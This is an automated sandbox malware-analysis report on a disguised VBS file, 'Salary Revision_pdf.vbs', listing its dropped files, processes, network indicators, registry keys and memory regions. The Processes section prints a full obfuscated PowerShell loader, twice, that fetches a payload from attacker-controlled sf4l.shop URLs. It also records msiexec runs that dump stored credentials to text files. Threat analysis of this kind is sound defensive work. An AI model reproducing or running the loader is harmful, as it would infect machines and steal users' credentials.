Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Salary Revision_pdf.vbs
|
ASCII text, with very long lines (2069), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ttvw2mg.11p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_322i4ygj.2sk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctp03biw.yyx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fobf55ak.02y.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv528A.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x9d174b8b, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Taxlessly199.Cho
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading
Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI;
function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan;
for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function
Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly
'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6
Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx
.t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly '
UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria
,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende
(Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm
: ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO
onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo
pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI
s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O
FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D
atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl
UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB
omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe
llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa
dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba
NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly
' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn
h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml
anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende
(Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana
Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN
ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM
CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe
O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende
(Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin
.itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a
ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov
aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly
' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys.
TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi
');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI
Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP
rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading
Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI;
function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan;
for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function
Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly
'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6
Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx
.t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly '
UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria
,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende
(Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm
: ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO
onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo
pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI
s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O
FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D
atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl
UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB
omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe
llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa
dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba
NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly
' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn
h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml
anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende
(Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana
Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN
ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM
CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe
O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende
(Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin
.itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a
ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov
aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly
' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys.
TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi
');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI
Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP
rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://sf4l.shop/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://geoplugin.net/json.gpp
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.imvu.comppData
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
|
unknown
|
||
|
https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://sf4l.shop
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://sf4l.shop/zWAbmrmP/Diwani.pfbP
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.bin
|
188.114.97.3
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://sf4l.shop
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.binzw
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://sf4l.shop/zWAbmrmP/Diwani.pfb
|
188.114.97.3
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://sf4l.shop/zWAbmrmP/Diwani.pfbXR
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 38 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
geoplugin.net
|
178.237.33.50
|
||
|
sf4l.shop
|
188.114.97.3
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
154.216.18.214
|
unknown
|
Seychelles
|
|
|
|
188.114.97.3
|
sf4l.shop
|
European Union
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-AOD6MB
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-AOD6MB
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-AOD6MB
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
501A000
|
heap
|
page read and write
|
|
|
|
4FEF000
|
heap
|
page read and write
|
|
|
|
501B000
|
heap
|
page read and write
|
|
|
|
1C4F4AC2000
|
trusted library allocation
|
page read and write
|
|
|
|
501B000
|
heap
|
page read and write
|
|
|
|
8C40000
|
direct allocation
|
page execute and read and write
|
|
|
|
501A000
|
heap
|
page read and write
|
|
|
|
501B000
|
heap
|
page read and write
|
|
|
|
601E000
|
trusted library allocation
|
page read and write
|
|
|
|
9456000
|
direct allocation
|
page execute and read and write
|
|
|
|
1C4E2C45000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
5E71000
|
trusted library allocation
|
page read and write
|
||
|
20710000
|
remote allocation
|
page read and write
|
||
|
32AE000
|
stack
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
23D97ABC000
|
heap
|
page read and write
|
||
|
C350AFE000
|
stack
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
1C4E2EE5000
|
heap
|
page read and write
|
||
|
7FFAAB860000
|
trusted library allocation
|
page execute and read and write
|
||
|
C350EBE000
|
stack
|
page read and write
|
||
|
208EB000
|
unclassified section
|
page execute and read and write
|
||
|
23D99856000
|
heap
|
page read and write
|
||
|
23D9783C000
|
heap
|
page read and write
|
||
|
23D997EF000
|
heap
|
page read and write
|
||
|
4E81000
|
heap
|
page read and write
|
||
|
305E000
|
stack
|
page read and write
|
||
|
4FBE000
|
heap
|
page read and write
|
||
|
8730000
|
heap
|
page read and write
|
||
|
509E000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
7FFAAB8E0000
|
trusted library allocation
|
page read and write
|
||
|
23D99824000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
5E99000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB821000
|
trusted library allocation
|
page read and write
|
||
|
23D99799000
|
heap
|
page read and write
|
||
|
1C4E53C8000
|
trusted library allocation
|
page read and write
|
||
|
298B000
|
stack
|
page read and write
|
||
|
C3505CE000
|
stack
|
page read and write
|
||
|
4E81000
|
heap
|
page read and write
|
||
|
703EF000
|
unkown
|
page readonly
|
||
|
7FFAAB980000
|
trusted library allocation
|
page read and write
|
||
|
1C4E2C48000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
34EE000
|
stack
|
page read and write
|
||
|
23D99690000
|
heap
|
page read and write
|
||
|
23D9783E000
|
heap
|
page read and write
|
||
|
7FFAAB990000
|
trusted library allocation
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
1C4FD086000
|
heap
|
page read and write
|
||
|
5020000
|
heap
|
page read and write
|
||
|
49A1000
|
heap
|
page read and write
|
||
|
790F000
|
heap
|
page read and write
|
||
|
7845000
|
heap
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
86F5000
|
trusted library allocation
|
page read and write
|
||
|
1C4F4A71000
|
trusted library allocation
|
page read and write
|
||
|
20AB1000
|
heap
|
page read and write
|
||
|
C350F3E000
|
stack
|
page read and write
|
||
|
46FE000
|
stack
|
page read and write
|
||
|
1C4E2A30000
|
heap
|
page read and write
|
||
|
23D997EF000
|
heap
|
page read and write
|
||
|
20A52000
|
heap
|
page read and write
|
||
|
23D99824000
|
heap
|
page read and write
|
||
|
23D997B6000
|
heap
|
page read and write
|
||
|
23D99691000
|
heap
|
page read and write
|
||
|
23D9783E000
|
heap
|
page read and write
|
||
|
5066000
|
heap
|
page read and write
|
||
|
1C4FCD90000
|
heap
|
page read and write
|
||
|
4DAE000
|
stack
|
page read and write
|
||
|
23D997FD000
|
heap
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
1C4E55DD000
|
trusted library allocation
|
page read and write
|
||
|
883C000
|
stack
|
page read and write
|
||
|
7FFAAB730000
|
trusted library allocation
|
page execute and read and write
|
||
|
3460000
|
heap
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
30D3000
|
heap
|
page read and write
|
||
|
7FFB1E870000
|
unkown
|
page read and write
|
||
|
1C4E4EE2000
|
trusted library allocation
|
page read and write
|
||
|
23D99843000
|
heap
|
page read and write
|
||
|
1C4E4677000
|
heap
|
page read and write
|
||
|
23D998E0000
|
heap
|
page read and write
|
||
|
72F0000
|
direct allocation
|
page read and write
|
||
|
7830000
|
heap
|
page read and write
|
||
|
20000000
|
direct allocation
|
page read and write
|
||
|
211B3000
|
unclassified section
|
page execute and read and write
|
||
|
8C70000
|
direct allocation
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
7FFAAB9F0000
|
trusted library allocation
|
page read and write
|
||
|
1C4E2C8D000
|
heap
|
page read and write
|
||
|
1C4FD013000
|
heap
|
page read and write
|
||
|
8B90000
|
trusted library allocation
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
23D99813000
|
heap
|
page read and write
|
||
|
7FFAAB82A000
|
trusted library allocation
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
4FA2000
|
heap
|
page read and write
|
||
|
2119D000
|
unclassified section
|
page execute and read and write
|
||
|
4F9E000
|
heap
|
page read and write
|
||
|
23D97873000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
